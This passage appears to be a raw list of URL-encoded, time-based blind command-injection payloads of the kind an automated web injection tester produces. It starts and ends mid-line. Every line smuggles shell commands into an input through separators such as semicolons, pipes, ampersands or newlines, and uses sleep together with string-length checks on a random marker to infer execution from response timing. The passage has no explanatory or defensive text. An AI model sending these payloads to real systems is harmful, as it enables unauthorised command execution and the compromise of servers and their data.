5D%20%7C%7C%20sleep%201%20%5C%5C\n%7C%20%5B%204%20-ne%20%24%28echo%20KBOHVQ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%7C%20%5B%205%20-ne%20%24%28echo%20KBOHVQ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%7C%20%5B%206%20-ne%20%24%28echo%20KBOHVQ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%7C%20%5B%207%20-ne%20%24%28echo%20KBOHVQ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%7C%20%5B%208%20-ne%20%24%28echo%20KBOHVQ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%7C%20%5B%209%20-ne%20%24%28echo%20KBOHVQ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20WQWTED%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20WQWTED%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20WQWTED%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20WQWTED%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20WQWTED%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20WQWTED%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20WQWTED%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20WQWTED%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20WQWTED%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%0A%20str%3D%24%28echo%20IXZJDX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%0A%20str%3D%24%28echo%20IXZJDX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%0A%20str%3D%24%28echo%20IXZJDX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%0A%20str%3D%24%28echo%20IXZJDX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%0A%20str%3D%24%28echo%20IXZJDX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%0A%20str%3D%24%28echo%20IXZJDX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%0A%20str%3D%24%28echo%20IXZJDX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%0A%20str%3D%24%28echo%20IXZJDX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%0A%20str%3D%24%28echo%20IXZJDX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%3B%20str%3D%24%28echo%20OJGBKF%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%3B%20str%3D%24%28echo%20OJGBKF%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%3B%20str%3D%24%28echo%20OJGBKF%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%3B%20str%3D%24%28echo%20OJGBKF%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%3B%20str%3D%24%28echo%20OJGBKF%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%3B%20str%3D%24%28echo%20OJGBKF%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%3B%20str%3D%24%28echo%20OJGBKF%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%3B%20str%3D%24%28echo%20OJGBKF%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%3B%20str%3D%24%28echo%20OJGBKF%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%7C%20%5B%201%20-ne%20%24%28echo%20PFDJXJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%7C%20%5B%202%20-ne%20%24%28echo%20PFDJXJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%7C%20%5B%203%20-ne%20%24%28echo%20PFDJXJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%7C%20%5B%204%20-ne%20%24%28echo%20PFDJXJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%7C%20%5B%205%20-ne%20%24%28echo%20PFDJXJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%7C%20%5B%206%20-ne%20%24%28echo%20PFDJXJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%7C%20%5B%207%20-ne%20%24%28echo%20PFDJXJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%7C%20%5B%208%20-ne%20%24%28echo%20PFDJXJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%7C%20%5B%209%20-ne%20%24%28echo%20PFDJXJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZYXRFF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZYXRFF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZYXRFF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZYXRFF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZYXRFF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZYXRFF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZYXRFF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZYXRFF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZYXRFF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%0A%20str%3D%24%28echo%20SPZWVR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%0A%20str%3D%24%28echo%20SPZWVR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%0A%20str%3D%24%28echo%20SPZWVR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%0A%20str%3D%24%28echo%20SPZWVR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%0A%20str%3D%24%28echo%20SPZWVR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%0A%20str%3D%24%28echo%20SPZWVR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%0A%20str%3D%24%28echo%20SPZWVR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%0A%20str%3D%24%28echo%20SPZWVR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%0A%20str%3D%24%28echo%20SPZWVR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%3B%20str%3D%24%28echo%20KNETDA%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%3B%20str%3D%24%28echo%20KNETDA%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%3B%20str%3D%24%28echo%20KNETDA%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%3B%20str%3D%24%28echo%20KNETDA%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%3B%20str%3D%24%28echo%20KNETDA%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%3B%20str%3D%24%28echo%20KNETDA%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%3B%20str%3D%24%28echo%20KNETDA%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%3B%20str%3D%24%28echo%20KNETDA%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%3B%20str%3D%24%28echo%20KNETDA%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%7C%20%5B%201%20-ne%20%24%28echo%20NYKVKX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%7C%20%5B%202%20-ne%20%24%28echo%20NYKVKX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%7C%20%5B%203%20-ne%20%24%28echo%20NYKVKX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%7C%20%5B%204%20-ne%20%24%28echo%20NYKVKX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%7C%20%5B%205%20-ne%20%24%28echo%20NYKVKX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%7C%20%5B%206%20-ne%20%24%28echo%20NYKVKX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%7C%20%5B%207%20-ne%20%24%28echo%20NYKVKX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%7C%20%5B%208%20-ne%20%24%28echo%20NYKVKX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%7C%20%5B%209%20-ne%20%24%28echo%20NYKVKX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JSQHHO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JSQHHO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JSQHHO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JSQHHO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JSQHHO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JSQHHO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JSQHHO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JSQHHO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JSQHHO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%0A%20str%3D%24%28echo%20DMZPTC%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%0A%20str%3D%24%28echo%20DMZPTC%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%0A%20str%3D%24%28echo%20DMZPTC%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%0A%20str%3D%24%28echo%20DMZPTC%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%0A%20str%3D%24%28echo%20DMZPTC%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%0A%20str%3D%24%28echo%20DMZPTC%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%0A%20str%3D%24%28echo%20DMZPTC%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%0A%20str%3D%24%28echo%20DMZPTC%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%0A%20str%3D%24%28echo%20DMZPTC%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%3B%20str%3D%24%28echo%20OQSIQL%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%3B%20str%3D%24%28echo%20OQSIQL%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%3B%20str%3D%24%28echo%20OQSIQL%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%3B%20str%3D%24%28echo%20OQSIQL%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%3B%20str%3D%24%28echo%20OQSIQL%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%3B%20str%3D%24%28echo%20OQSIQL%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%3B%20str%3D%24%28echo%20OQSIQL%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%3B%20str%3D%24%28echo%20OQSIQL%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%3B%20str%3D%24%28echo%20OQSIQL%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%7C%20%5B%201%20-ne%20%24%28echo%20QPUCUQ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%7C%20%5B%202%20-ne%20%24%28echo%20QPUCUQ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%7C%20%5B%203%20-ne%20%24%28echo%20QPUCUQ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%7C%20%5B%204%20-ne%20%24%28echo%20QPUCUQ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%7C%20%5B%205%20-ne%20%24%28echo%20QPUCUQ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%7C%20%5B%206%20-ne%20%24%28echo%20QPUCUQ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%7C%20%5B%207%20-ne%20%24%28echo%20QPUCUQ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%7C%20%5B%208%20-ne%20%24%28echo%20QPUCUQ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%7C%20%5B%209%20-ne%20%24%28echo%20QPUCUQ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VDSMTK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VDSMTK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VDSMTK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VDSMTK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VDSMTK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VDSMTK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VDSMTK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VDSMTK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VDSMTK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%0A%20str%3D%24%28echo%20LJKRDD%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%0A%20str%3D%24%28echo%20LJKRDD%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%0A%20str%3D%24%28echo%20LJKRDD%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%0A%20str%3D%24%28echo%20LJKRDD%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%0A%20str%3D%24%28echo%20LJKRDD%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%0A%20str%3D%24%28echo%20LJKRDD%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%0A%20str%3D%24%28echo%20LJKRDD%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sle